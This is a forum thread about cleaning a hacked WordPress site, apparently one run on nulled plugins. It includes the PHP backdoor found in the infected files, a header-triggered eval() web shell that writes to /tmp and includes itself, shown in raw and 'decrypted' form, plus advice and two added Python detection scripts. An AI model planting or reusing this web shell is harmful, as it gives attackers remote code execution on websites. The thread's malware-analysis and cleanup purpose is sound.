them how would i have found them in the first place? I even stated that they were off the 80 char screen, on the far right so obviously, i knew they were there
did not sound like you knew that.
Guess you did, i misread that
them how would i have found them in the first place? I even stated that they were off the 80 char screen, on the far right so obviously, i knew they were there
No worries... you did try to help and I appreciate your advice but I gotta tell you, I also have a local test environment and it too can get infected. But like I said, no worries, thank you for your help
You can call BS all you want. I am not the one that got hacked twice.
I run them to try them out, if I like them, then I purchase them to support the authors.
Yes it can, run on a separate vlan and all traffic blocked except to my ip.
No worries... you did try to help and I appreciate your advice but I gotta tell you, I also have a local test environment and it too can get infected. But like I said, no worries, thank you for your help
so can anyone decode this text - it was at the top of a lot of infected files.
I tried to Ctrl-V to insert the text inside a quote tag, but it wouldn't let me so I attached via the attached text file
$c = "@eval($_REQUEST["If-Unmodified-Since\"]);@eval($_HEADERS["If-Unmodified-Since"]);";
$_HEADERS = getallheaders();if(isset($_HEADERS['If-Modified-Since'])){$c="@eval($_REQUEST["Clear-Site-Data"]);@eval($_HEADERS["Clear-Site-Data"]);";$f='/tmp/.'.time();@file_put_contents($f, $c);@include($f);@unlink($f);}
$c = "@eval($_REQUEST["If-
Unmodified-Since\"]);@eval($_H
EADERS["If-Unmodified-Since"]);";
Here is the file decrypted
PHP:$_HEADERS = getallheaders(); if (isset($_HEADERS['X-Dns-Prefetch-Control'])) { $c = "@eval($_REQUEST["If-Unmodified-Since\"]);@eval($_HEADERS["If-Unmodified-Since"]);"; $f = .time(); file_put_contents($f, $c); include($f); unlink($f); }
Would you help me by showing how you decoded that string?
I use my own cli decoder I wrote, but this one works very well as long as they didn't use anything else to encode it.
Online PHP Javascript Script Decoder | Quttera
PHP decoder. Use to decode encrypted malware code.
malwaredecoder.com
or you can always search for decode php online for others.
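As an added example (not code from any poster in this thread): a Python scanner for the traits of the snippet posted above, namely eval() of request or header data, getallheaders(), a write-then-include of a temp file, and code sitting far to the right of the screen. The finding names, the sample line and the assumption that whitespace padding is what pushes the code past column 80 are constructed for illustration, not a complete signature set.

```python
import re
from pathlib import Path

# Heuristics drawn from the snippet quoted in the thread; names are made up here.
PATTERNS = {
    "eval-of-request-data": re.compile(
        r"eval\s*\(\s*\$_(REQUEST|POST|GET|COOKIE|HEADERS)\b"),
    "getallheaders": re.compile(r"\bgetallheaders\s*\("),
    "write-then-include": re.compile(
        r"file_put_contents\s*\(.*\binclude\s*\("),
}
# Assumption: the injected code is hidden by a long run of spaces or tabs.
OFFSCREEN = re.compile(r"[ \t]{80,}\S")

# Constructed sample line built from the fragment posted above.
SAMPLE = ("<?php" + " " * 120 +
          '$_HEADERS = getallheaders();@eval($_HEADERS["If-Unmodified-Since"]);\n'
          "echo 'hello';\n")


def scan_text(text):
    """Return sorted (line_number, finding) pairs for one PHP source string."""
    findings = []
    for number, line in enumerate(text.splitlines(), 1):
        findings += [(number, name) for name, rx in PATTERNS.items()
                     if rx.search(line)]
        if OFFSCREEN.search(line):
            findings.append((number, "offscreen-code"))
    return sorted(findings)


def scan_tree(root):
    """Map each .php file under root that has findings to its findings."""
    report = {}
    for path in Path(root).rglob("*.php"):
        hits = scan_text(path.read_text(errors="replace"))
        if hits:
            report[str(path)] = hits
    return report


if __name__ == "__main__":
    for number, name in scan_text(SAMPLE):
        print(f"line {number}: {name}")
```

A hit is a lead to inspect by hand; legitimate plugins also call some of these functions.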
@Sebrof each cron entry is attached to a plugin. You may get a copy of them on your local computer and check one by one.
Redownload all sources from where you got them then compare with the ones on your site.
If all are clear or identical with original downloaded files then get full wordpress folder and compare it with original version of wordpress downloaded from wordpress.org.
Somewhere a file has been edited to include malicious script that is running through cron.
wordfence is doing a great job of blocking logins - but I have no idea what criteria it is using to do these blocks. I haven't setup any "blocking" criteria. How is it knowing what logins are to be blocked?
WPForm has had quite a few vulnerabilities and could be the culprit. The other one you stated is a lazy loader plugin, not sure why it has all the extra characters in it for I do not use it.
will each plugin have its own folder with its cron entry?
The plugins on the site, if they are nulled, came from here and are at least one year old. I always balked at updating a nulled script if it seemed to be working fine. Maybe I should redownload the latest and then reinstall. The one that at this point seems sketchy is WPFORM
You will always have log in attempts since it is wordpress. Wordpress is one of the most attacked cms's there is.
Updated wpforms to the latest, now updating the rest of the plugins. Site seems to have calmed down except for a crapload of login attempts, all blocked by Wordfence.
glad you got it all fixed up!
i finally got the site 100% clean... wpforms was the main issue... if I had just updated it, any bad files with different names than those in the core would still be there so to be safe, I renamed WPFORMS to kill_wpForms then re-installed a fresh wpforms, then compared the folder and yep, just as I suspected, extra files in the original that would still be there had I just re-installed over the old installation.
Now the scan results look like this: (finally)
Thx for all the help from everyone... what a mess I had - would still be like that without the help of this site - another donation about to be processed
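As an added example (not code from any poster in this thread): the clean-copy comparison suggested earlier in the thread and used in the last post, written as a Python hash diff of an installed folder against a fresh download. The file names and contents in `demo()` are constructed; only the folder name kill_wpForms comes from the post.

```python
import hashlib
import tempfile
from pathlib import Path


def _hashes(root):
    """Map each file's path relative to root to its SHA-256 digest."""
    root = Path(root)
    return {p.relative_to(root).as_posix(): hashlib.sha256(p.read_bytes()).hexdigest()
            for p in root.rglob("*") if p.is_file()}


def compare_trees(installed, clean):
    """Classify files in `installed` against a freshly downloaded `clean` copy."""
    have, want = _hashes(installed), _hashes(clean)
    return {
        # Only on the site: re-installing over the old folder leaves these behind.
        "extra": sorted(set(have) - set(want)),
        "missing": sorted(set(want) - set(have)),
        # Same path, different content: an edited release file.
        "modified": sorted(f for f in have.keys() & want.keys()
                           if have[f] != want[f]),
    }


def demo():
    """Constructed sample: the renamed old plugin folder vs. a fresh download."""
    with tempfile.TemporaryDirectory() as tmp:
        old, new = Path(tmp, "kill_wpForms"), Path(tmp, "wpforms")
        for d in (old, new):
            (d / "includes").mkdir(parents=True)
            (d / "wpforms.php").write_text("<?php // plugin bootstrap\n")
            (d / "includes" / "functions.php").write_text("<?php // helpers\n")
        # Hypothetical tampering: one edited file and one file not in the release.
        (old / "includes" / "functions.php").write_text(
            "<?php // helpers\n/* injected */\n")
        (old / "includes" / "cache.php").write_text("<?php /* not in the release */\n")
        return compare_trees(old, new)


if __name__ == "__main__":
    for kind, files in demo().items():
        print(kind, files)
```

Compare against a download of the same version that is installed, otherwise ordinary release changes fill the "modified" list.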